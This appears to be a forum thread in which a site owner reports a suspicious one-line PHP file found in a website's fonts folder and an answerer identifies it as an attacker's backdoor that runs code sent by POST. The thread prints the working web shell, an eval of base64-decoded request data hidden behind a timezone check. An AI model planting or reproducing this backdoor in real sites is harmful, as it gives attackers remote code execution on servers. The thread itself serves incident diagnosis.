0

Possible Duplicate:
How do I deal with a compromised server?

Checking the lfd.log and noticed a block log for a script:

Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php

It looks like the script is trying to execute /usr/bin/php but when I see the code, it is a simple one line file

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

Anyone has a similar experience and is there any way to see what is causing the /usr/bin/php invokation? The logs say that the script is being called via POST.

Community
  • 1
Armand
  • 115
  • 8

1 Answers1

3

Someone placed an attack script in this directory. If eval isn't deactivated in your PHP configuration, this will allow the attacker to execute arbitrary PHP code it sends together with the request.

The script is invoked via a simple HTTP POST request.

You should consider your system compromised and try to find out how the attacker managed to place this script.

Sven
  • 97,248
  • 13
  • 177
  • 225